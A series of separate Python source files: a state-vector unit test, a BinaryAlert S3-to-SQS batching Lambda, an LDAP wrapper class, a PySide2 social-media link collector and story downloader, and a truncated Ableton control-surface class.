def testScalarVelocity(self):
"""
Test that the scalar velocity returns the expected value
"""
ans = 0.0288675134594813
sv1 = StateVector()
time1 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,
second=5)
pos1 = [1.0,2.0,3.0]
vel1 = [0.0166666,0.0166666,0.0166666]
sv1.setTime(time1)
sv1.setPosition(pos1)
sv1.setVelocity(vel1)
vel = sv1.getScalarVelocity()
self.assertAlmostEqual(ans,vel,5)
if __name__ == "__main__":
unittest.main()
|
nilq/baby-python
|
python
|
"""Batching Lambda function - puts all S3 objects into SQS to be re-analyzed."""
# Expects the following environment variables:
# BATCH_LAMBDA_NAME: The name of this Lambda function.
# BATCH_LAMBDA_QUALIFIER: The qualifier (alias) which is used to invoke this function.
# OBJECTS_PER_MESSAGE: The number of S3 objects to pack into a single SQS message.
# S3_BUCKET_NAME: Name of the S3 bucket to enumerate.
# SQS_QUEUE_URL: URL of the SQS queue which will buffer all of the S3 objects for analysis.
import json
import logging
import os
import boto3
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.INFO)
LAMBDA_CLIENT = boto3.client('lambda')
S3_CLIENT = boto3.client('s3')
SQS_CLIENT = boto3.client('sqs')
class SQSMessage(object):
"""Encapsulates a single SQS message (which will contain multiple S3 keys)."""
def __init__(self, msg_id):
"""Create a new message structure, which will store a list of S3 keys.
Args:
msg_id: [int] Message index in the global list.
"""
self._id = msg_id
self._keys = []
@property
def num_keys(self):
"""Returns [int] the number of keys stored in the SQS message so far."""
return len(self._keys)
def add_key(self, key):
"""Add another S3 key (string) to the message."""
self._keys.append(key)
def sqs_entry(self):
"""Returns a message entry [dict], as required by sqs_client.send_message_batch().
Moreover, the message body matches the structure of an S3 added event. This gives all
messages in the SQS the same format and enables the dispatcher to parse them consistently.
"""
return {
'Id': str(self._id),
'MessageBody': json.dumps({
'Records': [{'s3': {'object': {'key': key}}} for key in self._keys]
})
}
def reset(self):
"""Remove the stored list of S3 keys."""
self._keys = []
class SQSBatcher(object):
"""Collect groups of S3 keys and batch them into as few SQS requests as possible."""
def __init__(self, queue_url, objects_per_message, messages_per_batch=10):
"""Create a new SQS batcher.
Args:
queue_url: [string] URL of the queue to send messages to.
objects_per_message: [int] The maximum number of S3 keys to put in each SQS message.
messages_per_batch: [int] The maximum number of SQS messages to batch together.
SQS caps this value at 10.
Note that the downstream analyzer Lambdas will each process at most
(objects_per_message * messages_per_batch) binaries. The analyzer runtime limit is the
ultimate constraint on the size of each batch.
"""
self._queue_url = queue_url
self._objects_per_message = objects_per_message
self._messages_per_batch = messages_per_batch
self._messages = [SQSMessage(i) for i in range(messages_per_batch)]
self._msg_index = 0 # The index of the SQS message where keys are currently being added.
# The first and last keys added to this batch.
self._first_key = None
self._last_key = None
def _send_batch(self):
"""Group keys into messages and make a single batch request."""
LOGGER.info('Sending SQS batch of %d keys: %s ... %s',
sum(msg.num_keys for msg in self._messages), self._first_key, self._last_key)
response = SQS_CLIENT.send_message_batch(
QueueUrl=self._queue_url,
Entries=[msg.sqs_entry() for msg in self._messages if msg.num_keys > 0]
)
failures = response.get('Failed', [])
if failures:
for failure in failures:
LOGGER.error('Unable to enqueue S3 key %s: %s',
self._messages[int(failure['Id'])], failure['Message'])
boto3.client('cloudwatch').put_metric_data(Namespace='BinaryAlert', MetricData=[{
'MetricName': 'BatchEnqueueFailures',
'Value': len(failures),
'Unit': 'Count'
}])
for msg in self._messages:
msg.reset()
self._first_key = None
def add_key(self, key):
"""Add a new S3 key [string] to the message batch and send to SQS if necessary."""
if not self._first_key:
self._first_key = key
self._last_key = key
msg = self._messages[self._msg_index]
msg.add_key(key)
# If the current message is full, move to the next one.
if msg.num_keys == self._objects_per_message:
self._msg_index += 1
# If all of the messages are full, fire off to SQS.
if self._msg_index == self._messages_per_batch:
self._send_batch()
self._msg_index = 0
def finalize(self):
"""After all messages have been added, send the remaining as a last batch to SQS."""
if self._first_key:
LOGGER.info('Finalize: sending last batch of keys')
self._send_batch()
class S3BucketEnumerator(object):
"""Enumerates all of the S3 objects in a given bucket."""
def __init__(self, bucket_name, continuation_token=None):
"""Instantiate with an optional continuation token.
Args:
bucket_name: [string] Name of the S3 bucket to enumerate.
continuation_token: [string] Continuation token returned from S3 list objects.
"""
self.bucket_name = bucket_name
self.continuation_token = continuation_token
self.finished = False # Have we finished enumerating all of the S3 bucket?
def next_page(self):
"""Get the next page of S3 objects.
Returns:
List of string S3 object keys. Also sets self.finished = True if this is the last page.
"""
if self.continuation_token:
response = S3_CLIENT.list_objects_v2(
Bucket=self.bucket_name, ContinuationToken=self.continuation_token)
else:
response = S3_CLIENT.list_objects_v2(Bucket=self.bucket_name)
self.continuation_token = response.get('NextContinuationToken')
if not response['IsTruncated']:
self.finished = True
return [obj['Key'] for obj in response['Contents']]
def batch_lambda_handler(event, lambda_context):
"""Entry point for the batch Lambda function.
Args:
event: [dict] Invocation event. If 'S3ContinuationToken' is one of the keys, the S3 bucket
will be enumerated beginning with that continuation token.
lambda_context: [LambdaContext] object with .get_remaining_time_in_millis().
Returns:
[int] The number of enumerated S3 keys.
"""
LOGGER.info('Invoked with event %s', json.dumps(event))
s3_enumerator = S3BucketEnumerator(
os.environ['S3_BUCKET_NAME'], event.get('S3ContinuationToken'))
sqs_batcher = SQSBatcher(os.environ['SQS_QUEUE_URL'], int(os.environ['OBJECTS_PER_MESSAGE']))
# As long as there are at least 10 seconds remaining, enumerate S3 objects into SQS.
num_keys = 0
while lambda_context.get_remaining_time_in_millis() > 10000 and not s3_enumerator.finished:
keys = s3_enumerator.next_page()
num_keys += len(keys)
for key in keys:
sqs_batcher.add_key(key)
# Send the last batch of keys.
sqs_batcher.finalize()
# If the enumerator has not yet finished but we're low on time, invoke this function again.
if not s3_enumerator.finished:
LOGGER.info('Invoking another batcher')
LAMBDA_CLIENT.invoke(
FunctionName=os.environ['BATCH_LAMBDA_NAME'],
InvocationType='Event', # Asynchronous invocation.
Payload=json.dumps({'S3ContinuationToken': s3_enumerator.continuation_token}),
Qualifier=os.environ['BATCH_LAMBDA_QUALIFIER']
)
return num_keys
|
nilq/baby-python
|
python
|
from cmanager import CreditManager
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import ldap
#import ldap.modlist as modlist
from brie.config import ldap_config
from brie.lib.log_helper import BrieLogging
from brie.model.ldap import Groupes
class Groups(object):
__groups = list()
def __init__(self, groups):
self.__groups = groups
#end def
def __getattr__(self, name):
return name in self.__groups
#end def
def list(self):
return list(self.__groups)
#end def
#end class
class User(object):
ldap_bind = None
attrs = None
groups = None
residence_dn = None
def __init__(self, ldap_bind, attrs, residence_dn = None):
self.ldap_bind = ldap_bind
self.attrs = attrs
self.residence_dn = residence_dn
if attrs is not None:
groups = Groupes.get_by_user_dn(self, residence_dn, self.attrs.dn)
self.groups = Groups(groups)
#end if
#end def
#end class
""" Classe de manipulation de la base ldap """
class Ldap(object):
__connection = None
""" Connexion à la base """
def __init__(self, connection):
self.__connection = connection
#end def
""" Methode de connexion à la base de donnée
dn : dn de connexion
password : mot de passe
"""
@staticmethod
def connect(dn, password):
connection = None
# try:
connection = ldap.initialize(ldap_config.uri)
connection.simple_bind_s(dn, password)
# except:
# return None
#end try
if connection is not None:
return Ldap(connection)
#end
return None
#end def
""" Recherche sur la base
dn : base de recherche
filter : filtre ldap de recherche
scope : portée de recherche (SCOPE_SUBTREE, SCOPE_BASE, SCOPE_ONELEVEL)
"""
def search(self, dn, filter, scope = ldap.SCOPE_SUBTREE):
dn = Ldap.str_attribute(dn)
filter = Ldap.str_attribute(filter)
try:
results = self.__connection.search_s(dn, scope, filter)
except ldap.NO_SUCH_OBJECT:
return []
#end try
ldap_results = []
for result in results:
result_dn = result[0]
attributes = result[1]
val_dict = dict()
for attribute in attributes.iteritems():
name = attribute[0]
values = attribute[1]
ldap_value = LdapAttribute(name, values)
val_dict[name] = ldap_value
#end for
ldap_result = LdapEntry(result_dn, val_dict)
ldap_results.append(ldap_result)
#end for
return ldap_results
#end def
def get_childs(self, dn, filter = "(objectClass=*)"):
results = self.search(dn, filter)
tree = [None, dict()]
for result in results:
if result.dn == dn:
tree[0] = result
else:
result_dn = result.dn.replace(dn, "").split(",")
tree_c = tree
result_dn.reverse()
for dn_split in result_dn:
if dn_split != "":
if not dn_split in tree_c[1]:
tree_c[1][dn_split] = [None, dict()]
tree_c = tree_c[1][dn_split]
else:
tree_c = tree_c[1][dn_split]
#end if
#end if
#end for
tree_c[0] = result
#end if
#end for
return LdapEntryTree(tree[0], tree[1])
#end def
""" Recherche le premier resultat sur la base
appel la methode "search" en interne
"""
def search_first(self, dn, filter, scope = ldap.SCOPE_SUBTREE):
results = self.search(dn, filter, scope)
if results is None: return None
for result in results:
return result
#end for
return None
#end def
""" Recherche seulement l'element décrit par le dn donnée """
def search_dn(self, dn):
return self.search_first(dn, "(objectClass=*)", ldap.SCOPE_BASE)
@staticmethod
def str_attributes(attributes):
def str_value(value):
if isinstance(value, list):
return [Ldap.str_attribute(subval) for subval in value]
#end if
return Ldap.str_attribute(value)
#end def
return dict([
(keyval[0], str_value(keyval[1]))
for keyval in attributes.iteritems()
])
#end def
@staticmethod
def str_attributes_list(attributes):
def str_value(value):
if isinstance(value, list):
return [Ldap.str_attribute(subval) for subval in value]
elif isinstance(value, LdapAttribute):
return [Ldap.str_attribute(subval) for subval in value.all()]
#end if
return Ldap.str_attribute(value)
#end def
return dict([
(keyval, str_value(attributes[keyval]))
for keyval in attributes
])
#end def
@staticmethod
def str_attribute(value):
if isinstance(value, str):
return value
elif isinstance(value, unicode):
return unicode.encode(value, "utf-8")
#end if
return str(value)
#end def
""" Remplace les attributs d'un dn donné
dn : adresse de l'élément
attributes : dictionnaire d'attributs
"""
def replace_attr(self, dn, attributes):
attributes = Ldap.str_attributes(attributes)
modlist = []
for attribute in attributes.iteritems():
modlist.append((ldap.MOD_REPLACE, attribute[0], attribute[1]))
#end for
self.__connection.modify_s(dn, modlist)
#end def
""" Ajouter les attributs d'un dn donné
dn : addresse de l'élément
attributes : dictionnaire des nouveaux attributs
"""
def add_attr(self, dn, attributes):
attributes = Ldap.str_attributes(attributes)
modlist = []
for attribute in attributes.iteritems():
modlist.append((ldap.MOD_ADD, attribute[0], attribute[1]))
#end for
try:
self.__connection.modify_s(dn, modlist)
except ldap.TYPE_OR_VALUE_EXISTS:
pass
#end def
""" Supprime les attributs d'un dn donné
dn : adresse de l'élément
attributes : dictionnaire des attributs à supprimer
"""
def delete_attr(self, dn, attributes):
attributes = Ldap.str_attributes(attributes)
modlist = []
for attribute in attributes.iteritems():
modlist.append((ldap.MOD_DELETE, attribute[0], attribute[1]))
#end for
#try:
self.__connection.modify_s(dn, modlist)
#except:
# pass
#end def
""" Ajoute un nouvelle élément
dn : adresse du nouvelle élément
attributes : dictionnaire des attributes de l'élément
"""
def add_entry(self, dn, attributes):
attributes = Ldap.str_attributes(attributes)
modlist = []
for attribute in attributes.iteritems():
modlist.append((attribute[0], attribute[1]))
#end for
##try:
self.__connection.add_s(dn, modlist)
##except:
## pass
#end def
""" Clone un élément
dn : adresse du nouvelle élément
attributes : l'élément à cloner
"""
def clone_entry(self, dn, ldap_entry):
attributes = Ldap.str_attributes_list(ldap_entry.__dict__)
del attributes['dn']
modlist = []
for attribute in attributes.iteritems():
modlist.append((attribute[0], attribute[1]))
#end for
##try:
self.__connection.add_s(dn, modlist)
##except:
## pass
#end def
""" Supprime un élement donné """
def delete_entry(self, dn):
#try:
self.__connection.delete_s(dn)
#except:
# pass
#end def
""" Supprime récursivement un élément et ses fils """
def delete_entry_subtree(self, dn):
entries = self.search(dn, "(objectClass=*)")
for entry in reversed(entries):
self.delete_entry(entry.dn)
#end for
#end def
""" Renomme un élément """
def rename_entry(self, dn, newdn, superior):
self.__connection.rename_s(dn, newdn, newsuperior= superior)
""" Sauvegarde en base une valeur l'élément donné """
def save(self, ldap_entry):
modlist = []
for global_deletion in ldap_entry._deletions:
modlist.append((ldap.MOD_DELETE, global_deletion, None))
#end for
ldap_entry._deletions = []
ldap_attributes = (
attribute
for attribute in ldap_entry.__dict__.itervalues()
if isinstance(attribute, LdapAttribute)
)
for ldap_attribute in ldap_attributes:
BrieLogging.get().debug("name : " + ldap_attribute.name)
BrieLogging.get().debug("values : " + str(ldap_attribute.values))
BrieLogging.get().debug("deletions : " + str(ldap_attribute._deletions))
BrieLogging.get().debug("additions : " + str(ldap_attribute._additions))
BrieLogging.get().debug("modified : " + str(ldap_attribute._modified))
if ldap_attribute._deletions != []:
str_values = [str(value) for value in ldap_attribute._deletions]
modlist.append((ldap.MOD_DELETE, ldap_attribute.name, str_values))
ldap_attribute._deletions = []
#end if
if ldap_attribute._additions != []:
str_values = [str(value) for value in ldap_attribute._additions]
modlist.append((ldap.MOD_ADD, ldap_attribute.name, str_values))
ldap_attribute._additions = []
#end if
if ldap_attribute._modified:
str_values = [str(value) for value in ldap_attribute.values]
modlist.append((ldap.MOD_REPLACE, ldap_attribute.name, str_values))
ldap_attribute._modified = False
#end for
#end for
BrieLogging.get().debug("dn : " + ldap_entry.dn)
BrieLogging.get().debug("modlist : " + str(modlist))
if modlist != []:
self.__connection.modify_s(ldap_entry.dn, modlist)
# On recharge l'entrée après la sauvegarde
entry_reloaded = self.search_dn(ldap_entry.dn)
ldap_entry.__dict__ = entry_reloaded.__dict__
#end def
""" Ferme la connexion à la base """
def close(self):
self.__connection.unbind()
#end class
""" Classe représentant un élément ldap """
class LdapEntry(object):
dn = None
_deletions = []
def __init__(self, dn, var_dict):
self.__dict__ = var_dict
self.dn = dn.decode("utf-8")
#end def
""" Retourne si un attribut existe sur cette élément """
def has(self, attribute_name):
return attribute_name in self.__dict__
#end def
""" Retourne la valeur d'un attribut donné """
def get(self, name):
if name in self.__dict__:
return self.__dict__[name]
else:
return self.__getattr__(name)
#end if
#end def
def __getattr__(self, name):
attr = LdapAttribute(name, [])
self.__dict__[name] = attr
return attr
#end def
""" Ajoute un attribut """
def add(self, name, value = None):
if self.has(name):
if value is not None:
value = self.get(name)
value.add(value)
#end if
else:
values = []
if value is not None:
values = [value]
#end if
self.__dict__[name] = LdapAttribute(name, values)
self.__dict__[name]._additions = values
#end if
#end def
""" Supprime un attribut """
def delete(self, name, value = None):
if self.has(name):
if value is not None:
value = self.get(name)
value.delete(value)
else:
del self.__dict__[name]
self._deletions.append(name)
#end if
#end if
#end def
#end class
""" Classe représentant la valeur d'un attribut """
class LdapAttribute(object):
name = None
values = None
_deletions = None
_additions = None
_modified = False
def __init__(self, name, values):
self.values = [value.decode("utf-8") for value in values]
self.name = name
self._deletions = list()
self._additions = list()
#end def
""" Retourne la première valeur de cet attribut """
def first(self, default = None):
for value in self.values:
return unicode(value)
#end for
if default is None:
return None
return unicode(default)
#end def
""" Retourne toutes les valeurs de cet attribut """
def all(self):
return self.values
#end def
""" Ajoute une valeur à cet attribut
Note : la valeur ne sera pas ajouté si elle existe déjà
"""
def add(self, value):
if not value in self.values:
self.values.append(value)
self._additions.append(value)
#end if
#end def
""" Supprime une valeur de cet attribut """
def delete(self, value):
if value in self.values:
self.values = [old for old in self.values if old != value]
# Si il vient d'être ajouté, on l'enleve simplement
# de la queue d'ajout
# sinon on l'ajoute dans la queue de suppression
if value in self._additions:
self._additions = [old for old in self._additions if old != value]
else:
self._deletions.append(value)
#end if
#end if
#end def
""" Modifie une valeur de cet attribut
si la valeur est nulle, modifie la première valeur
"""
def replace(self, old, new):
if old == new:
return
# Fonction usuelle de remplacement
def replace(current):
if current == old:
return new
#end if
return current
#end def
# Si la valeur modifié existe déjà
# l'ancienne valeur n'est que supprimée
if new in self.values:
self.delete(old)
elif self.values == []:
self.add(new)
else:
self.values = [replace(value) for value in self.values]
# Si la valeur modifié vient d'être ajouté,
# elle est modifié dans la queue d'addition
self._additions = [replace(value) for value in self._additions]
self._modified = True
#end if
#end def
#end class
class LdapEntryTree(LdapEntry):
childs = None
val = None
def __init__(self, val, childs):
self.val = val
self.__dict__ = val.__dict__
self.__dict__['value'] = val
self.childs = dict()
if len(childs) > 0:
for key,child in childs.iteritems():
key = key.split("=")[1]
self.childs[key] = LdapEntryTree(child[0], child[1])
self.__dict__[key] = self.childs[key]
#end for
#end if
#end def
def __getattr__(self, name):
attr = LdapAttribute(name, [])
self.__dict__[name] = attr
return attr
#end def
#end class
|
nilq/baby-python
|
python
|
import sys
import json
import twint
import threading
import lzma
import glob
import instaloader
import os
import shutil
from datetime import datetime
from googleapiclient.discovery import build
from facebook_scraper import get_posts
from PySide2.QtQml import QQmlApplicationEngine
from PySide2.QtCore import QObject, Slot, Signal, QTimer, QUrl
from PySide2.QtGui import QGuiApplication, QIcon
class storyThread (threading.Thread):
def __init__(self,name, kullaniciAdi,sifre):
threading.Thread.__init__(self)
self.name = name
self.kullaniciAdi = kullaniciAdi
self.sifre = sifre
def run(self):
self.downloadStories(self.name,self.kullaniciAdi,self.sifre)
def downloadStories(self, allUsers,kullaniciAdi,sifre):
L = instaloader.Instaloader()
L.login(str(kullaniciAdi), str(sifre))
L2 = instaloader.Instaloader()
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Story)"
list_username = allUsers.split("-")
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
print(
"Dosya önceden oluşturulmuş. Lütfen kontrol et. Hata devam ederse Senfonico Linkler içindeki %s dosyasını silip tekrar deneyebilirsin." % directoryFirst)
for i in list_username:
profile = L2.check_profile_id(i)
L.download_stories(userids=[profile.userid])
path_stories = ":stories"
jpg_files = glob.glob(path_stories + "/**/*.jpg", recursive=True)
json_files = glob.glob(path_stories + "/**/*.xz", recursive=True)
mp4_files = glob.glob(path_stories + "/**/*.mp4", recursive=True)
for jsonAd in json_files:
index = jsonAd.find("json.xz")
newJson = jsonAd[:33]
newJpeg = newJson + "jpg"
newMp4 = newJson + "mp4"
jpeg = newJpeg.replace("\\", "/")
mp4 = newMp4.replace("\\", "/")
with lzma.open(jsonAd, mode='rt') as file:
for line in file:
a = line.find("username\":\"")
c = -1
for b in line[a + 11:]:
c = c + 1
if b == "\"":
username = line[a + 11:a + c + 11]
directory = username +" " +str(datetime.now().hour)+"."+str(datetime.now().minute)
parent_dir = path_directoryFirst
path = os.path.join(parent_dir, directory)
try:
os.makedirs(path, exist_ok=True)
except OSError as error:
print("%s Dosya önceden oluşturulmuş. Lütfen kontrol et" % directory)
try:
original = jpeg
target = path
if os.path.isfile(mp4):
shutil.move(mp4, target)
else:
shutil.move(original, target)
except shutil.Error as e:
print(e)
break
try:
shutil.rmtree(":stories")
except FileNotFoundError as error:
print(i + " için story bulunamadı")
class instagramThread (threading.Thread):
def __init__(self,name, dateStart , dateEnd,kullaniciAdi, sifre):
threading.Thread.__init__(self)
self.dateStart = dateStart
self.name = name
self.dateEnd = dateEnd
self.kullaniciAdi = kullaniciAdi
self.sifre = sifre
def run(self):
startList = self.dateStart.split("-")
endList = self.dateEnd.split("-")
self.getInstagramLink(int(startList[0]),
int(startList[1]),
int(startList[2]),
int(endList[0]),
int(endList[1]),
int(endList[2]),
self.name,self.kullaniciAdi,self.sifre)
def getInstagramLink(self, sYil, sAy, sGun, eYil, eAy, eGun, allUsers, kullaniciAdi, sifre):
L = instaloader.Instaloader()
L.login(str(kullaniciAdi), str(sifre))
start = datetime(sYil, sAy, sGun)
end = datetime(eYil, eAy, eGun)
list_username = allUsers.split("-")
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Instagram)"
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
print(
"Dosya önceden oluşturulmuş. Lütfen kontrol et. Hata devam ederse Senfonico Linkler içindeki %s dosyasını silip tekrar deneyebilirsin." % directoryFirst)
for username in list_username:
text = path_directoryFirst + "/" + username + " " + str(datetime.now().hour) + "." + str(
datetime.now().minute) + ".txt"
f = open(text, 'w')
a = 0
profile = instaloader.Profile.from_username(L.context, username)
posts = profile.get_posts()
print(username + " ---")
for post in posts:
if post.date > start and post.date > end:
pass
elif post.date >= start and post.date <= end:
a = 1
link = "https://www.instagram.com/p/" + post.shortcode + "/?utm_source=ig_web_copy_link"
f.write(link + "\n")
print("https://www.instagram.com/p/" + post.shortcode + "/?utm_source=ig_web_copy_link")
elif post.date <= start:
break
if a == 0:
f.close()
os.remove(text)
class twitterThread (threading.Thread):
def __init__(self,name, dateStart , dateEnd):
threading.Thread.__init__(self)
self.dateStart = dateStart
self.name = name
self.dateEnd = dateEnd
def run(self):
startList = self.dateStart.split("-")
endList = self.dateEnd.split("-")
self.getTwitterlink(int(startList[0]),
int(startList[1]),
int(startList[2]),
int(endList[0]),
int(endList[1]),
int(endList[2]),
self.name)
def getTwitterlink(self, sYil, sAy, sGun, eYil, eAy, eGun, allUsers):
list_username = allUsers.split("-")
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Twitter)"
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
print(
"Dosya önceden oluşturulmuş. Lütfen kontrol et. Hata devam ederse Senfonico Linkler içindeki %s dosyasını silip tekrar deneyebilirsin." % directoryFirst)
for username in list_username:
c = twint.Config()
c.Since = str(sYil) + "-" + str(sAy) + "-" + str(sGun)
c.Until = str(eYil) + "-" + str(eAy) + "-" + str(eGun)
c.Store_json = True
#c.User_id = 'randomstring'
c.Username = username
c.Output = username + ".json"
twint.run.Search(c)
if os.path.exists(username + ".json"):
text = path_directoryFirst + "/" + username + " " + str(datetime.now().hour) + "." + str(
datetime.now().minute) + ".txt"
f = open(text, 'w')
print("Linkler başarıyla alındı")
tweets = []
try:
for line in open(username + ".json", 'r', encoding='UTF-8'):
tweets.append(json.loads(line))
print(username)
for tweet in tweets:
f.write(tweet["link"] + "\n")
print(tweet["link"])
f.close()
except Exception as e:
print("Okumada bir hata oluştu. Lütfen sonradan yeniden dene.")
if os.path.exists(username + ".json"):
os.remove(username + ".json")
else:
print("Belirtilen aralıkta daha fazla link bulunmamaktadır.")
class facebookThread (threading.Thread):
def __init__(self,name, dateStart , dateEnd):
threading.Thread.__init__(self)
self.dateStart = dateStart
self.name = name
self.dateEnd = dateEnd
def run(self):
startList = self.dateStart.split("-")
endList = self.dateEnd.split("-")
self.getFacebookLink(int(startList[0]),
int(startList[1]),
int(startList[2]),
int(endList[0]),
int(endList[1]),
int(endList[2]),
self.name)
def getFacebookLink(self, sYil, sAy, sGun, eYil, eAy, eGun, allUsers):
start = datetime(sYil, sAy, sGun)
end = datetime(eYil, eAy, eGun)
list_username = allUsers.split("-")
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Facebook)"
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
print(
"Dosya önceden oluşturulmuş. Lütfen kontrol et. Hata devam ederse Senfonico Linkler içindeki %s dosyasını silip tekrar deneyebilirsin." % directoryFirst)
for i in list_username:
text = path_directoryFirst + "/" + i + " " +str(datetime.now().hour)+"."+str(datetime.now().minute) + ".txt"
f = open(text, 'w')
print(i)
a = 0
for post in get_posts(i, pages=50):
if start < post["time"] and post["time"] < end:
a = 1
f.write(post['post_url'] + "\n")
print(post['post_url'])
elif start > post["time"]:
f.close()
break
if a == 0:
os.remove(text)
class youtubeThread (threading.Thread):
def __init__(self,name, dateStart , dateEnd):
threading.Thread.__init__(self)
self.dateStart = dateStart
self.name = name
self.dateEnd = dateEnd
def run(self):
startList = self.dateStart.split("-")
endList = self.dateEnd.split("-")
self.getYoutubeLink(int(startList[0]),
int(startList[1]),
int(startList[2]),
int(endList[0]),
int(endList[1]),
int(endList[2]),
self.name)
def getYoutubeLink(self, sYil, sAy, sGun, eYil, eAy, eGun, allUsers):
api_key = "YOUR YOUTUBE API KEY"
youtube = build('youtube', 'v3', developerKey=api_key)
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Youtube)"
list_of_channel = allUsers.split(".")
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
print(
"Dosya önceden oluşturulmuş. Lütfen kontrol et. Hata devam ederse Senfonico Linkler içindeki %s dosyasını silip tekrar deneyebilirsin." % directoryFirst)
for channelID in list_of_channel:
text = path_directoryFirst + "/" + channelID+" " +str(datetime.now().hour)+"."+str(datetime.now().minute) + ".txt"
f = open(text, 'w')
request = youtube.search().list(
part='id,snippet',
channelId=channelID,
type='video',
order='date',
fields='nextPageToken,items(id,snippet)',
maxResults=50,
publishedAfter=str(sYil) + '-' + str(sAy) + '-' + str(sGun) + 'T00:00:00Z',
publishedBefore=str(eYil) + '-' + str(eAy) + '-' + str(eGun) + 'T00:00:00Z',
)
list_of_links = []
while request:
response = request.execute()
video_link_array = [f"https://www.youtube.com/watch?v={video['id']['videoId']}" \
for video in response['items']]
for videoLink in video_link_array:
list_of_links.append(videoLink)
request = youtube.search().list_next(
request, response)
print(channelID)
for link in list_of_links:
f.write(link + "\n")
print(link)
f.close()
size = os.path.getsize(text)
if size == 0:
os.remove(text)
class MainWindow(QObject):
def __init__(self):
QObject.__init__(self)
@Slot(str,str,str, str, str)
def toGetInstagramLink(self, name, dateStart , dateEnd, kullaniciAdi, sifre):
threadInstagram = instagramThread(name, dateStart, dateEnd, kullaniciAdi, sifre)
threadInstagram.start()
@Slot(str, str, str)
def toGetTwitterLink(self, name, dateStart, dateEnd):
threadTwitter = twitterThread(name, dateStart, dateEnd)
threadTwitter.start()
@Slot(str, str, str)
def toGetFacebookLink(self, name, dateStart, dateEnd):
threadFacebook = facebookThread(name, dateStart, dateEnd)
threadFacebook.start()
@Slot(str, str, str)
def toGetYoutubeLink(self, name, dateStart, dateEnd):
threadYoutube = youtubeThread(name, dateStart, dateEnd)
threadYoutube.start()
@Slot(str,str,str)
def toGetDownloadStory(self, name, kullaniciAdi,sifre):
threadStory = storyThread(name, kullaniciAdi,sifre)
threadStory.start()
if __name__ == "__main__":
app = QGuiApplication(sys.argv)
engine = QQmlApplicationEngine()
# Get Context
main = MainWindow()
engine.rootContext().setContextProperty("backend", main)
# Set App Extra Info
app.setOrganizationName("senfoni.co")
app.setOrganizationDomain("N/A")
# Set Icon
app.setWindowIcon(QIcon("senfonico_logo_siyah.ico"))
# Load Initial Window
engine.load(os.path.join(os.path.dirname(__file__), "main.qml"))
if not engine.rootObjects():
sys.exit(-1)
sys.exit(app.exec_())
|
nilq/baby-python
|
python
|
from _Framework.ButtonSliderElement import ButtonSliderElement
SLIDER_MODE_OFF = 0
SLIDER_MODE_TOGGLE = 1
SLIDER_MODE_SLIDER = 2
SLIDER_MODE_PRECISION_SLIDER = 3
SLIDER_MODE_SMALL_ENUM = 4
SLIDER_MODE_BIG_ENUM = 5
#TODO: repeat buttons.
# not exact / rounding values in slider and precision slider
class DeviceControllerStrip(ButtonSliderElement):
def __init__(self, buttons, control_surface, parent = None):
ButtonSliderElement.__init__(self, buttons)
self._control_surface = control_surface
self._parent = parent
self._num_buttons = len(buttons)
self._value_map = tuple([float(index) / (self._num_buttons-1) for index in range(self._num_buttons)])
self._precision_mode = False
self._enabled = True
def set_enabled(self,enabled):
self._enabled = enabled
def set_precision_mode(self, precision_mode):
self._precision_mode = precision_mode
self.update()
@property
def _value(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.value
else:
return 0
@property
def _max(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.max
else:
return 0
@property
def _min(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.min
else:
return 0
@property
def _range(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.max - self._parameter_to_map_to.min
else:
return 0
@property
def _default_value(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to._default_value
else:
return 0
@property
def _is_quantized(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.is_quantized
else:
return False
@property
def _mode(self):
if self._parameter_to_map_to != None:
if self._is_quantized:
if self._range == 1:
return SLIDER_MODE_TOGGLE
elif self._range<=self._num_buttons:
return SLIDER_MODE_SMALL_ENUM
else:
return SLIDER_MODE_BIG_ENUM
else:
